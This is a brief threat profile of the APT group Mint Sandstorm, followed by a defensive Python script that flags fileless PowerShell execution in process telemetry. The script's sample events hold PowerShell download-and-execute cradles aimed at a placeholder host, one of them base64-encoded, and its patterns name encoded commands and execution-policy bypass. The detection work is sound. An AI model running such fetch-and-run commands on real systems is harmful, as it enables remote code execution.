Mint Sandstorm is an advanced persistent threat (APT) that targets organizations in various industries, including finance and healthcare. It uses multiple techniques to evade detection by security tools, such as steganography, fileless execution, and obfuscation of malware code. The group behind Mint Sandstorm is highly skilled and has been active since at least 2013. They have targeted organizations in the United States, Europe, Asia, Africa, South America, and Australia.
Techniques, tactics and practices:
Beyond the evasion techniques noted above (steganography, fileless execution and obfuscation of malware code), the group's tactics include spear-phishing emails with messages tailored to specific targets, exploitation of vulnerabilities in software or systems, and use of legitimate software to hide its activity. Its operational practices include maintaining multiple domains and IP addresses, changing infrastructure frequently, and avoiding common security tools rather than relying on them.
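The fileless-execution and obfuscation techniques listed above leave little on disk, so defenders usually look for them in process-creation telemetry instead. The Python below is an added example written for this page; it is not code from the page or from any vendor report on Mint Sandstorm and does not reproduce any specific tooling of the group. It assumes the defender has process-creation events (image name plus full command line, as Sysmon event ID 1 or an EDR equivalent provides) and checks each PowerShell launch for generic fileless indicators: a base64 -EncodedCommand payload, a hidden window, an execution-policy bypass, and an in-memory download cradle. The sample events are constructed for the example.

```python
"""Flag process-creation events that look like fileless PowerShell execution.

Added example for this page (not the page's own code).  Assumes process-creation
telemetry that exposes the image name and the full command line.
"""
import base64
import re
from typing import List, Optional, Tuple

# PowerShell accepts unambiguous prefixes of its switches, so match the
# -EncodedCommand family (-e, -ec, -en, -enc, ...) followed by a base64 blob.
ENCODED_SWITCH = re.compile(
    r"(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)
# -w hidden / -WindowStyle hidden: the console never appears to the user.
HIDDEN_WINDOW = re.compile(r"(?:^|\s)-w(?:i[a-z]*)?\s+hidden", re.IGNORECASE)
# -ep bypass / -ExecutionPolicy bypass: script-signing policy switched off.
POLICY_BYPASS = re.compile(r"(?:^|\s)-e(?:p|x[a-z]*)\s+bypass", re.IGNORECASE)
# Invoke-Expression (alias IEX) fed by a web download: the script runs from
# memory and is never written to disk.
DOWNLOAD_CRADLE = re.compile(
    r"(?:iex|invoke-expression)[\s\S]*?"
    r"(?:downloadstring|downloaddata|invoke-webrequest|iwr|net\.webclient)",
    re.IGNORECASE,
)

# Constructed sample events (image, command line); not real telemetry.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS: List[Tuple[str, str]] = [
    ("powershell.exe", f"powershell.exe -NoProfile -ep Bypass -enc {ENCODED}"),
    ("powershell.exe", "powershell.exe -Command Get-ChildItem C:\\Users"),
    ("cmd.exe", "cmd.exe /c dir"),
    ("powershell.exe",
     "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/x')\""),
]


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload, or None if absent/invalid.

    PowerShell encodes the payload as base64 over UTF-16LE text.
    """
    match = ENCODED_SWITCH.search(cmdline)
    if not match:
        return None
    try:
        raw = base64.b64decode(match.group(1), validate=True)
        return raw.decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        # Not valid base64 or not UTF-16LE: still worth a look, but not decodable here.
        return None


def fileless_indicators(image: str, cmdline: str) -> List[str]:
    """List the fileless-execution indicators present in one event."""
    haystack = (image + " " + cmdline).lower()
    if "powershell" not in haystack and "pwsh" not in haystack:
        return []  # the switches above are PowerShell-specific
    indicators: List[str] = []
    text = cmdline
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        indicators.append("encoded_command")
        text = cmdline + " " + decoded  # inspect the decoded payload as well
    if HIDDEN_WINDOW.search(cmdline):
        indicators.append("hidden_window")
    if POLICY_BYPASS.search(cmdline):
        indicators.append("execution_policy_bypass")
    if DOWNLOAD_CRADLE.search(text):
        indicators.append("download_cradle")
    return indicators


def triage(events: List[Tuple[str, str]]) -> List[Tuple[str, List[str]]]:
    """Return (image, indicators) for every event that raised at least one indicator."""
    hits = []
    for image, cmdline in events:
        found = fileless_indicators(image, cmdline)
        if found:
            hits.append((image, found))
    return hits


if __name__ == "__main__":
    for image, found in triage(SAMPLE_EVENTS):
        print(f"{image}: {', '.join(found)}")
```

Decoding the encoded payload before matching matters: the download cradle in the first sample event is invisible in the raw command line and only appears once the base64 is expanded, which is exactly the obfuscation the page describes. Run on real telemetry, the three weaker indicators (hidden window, policy bypass, encoded command) are noisy on their own and are best scored together with the cradle check.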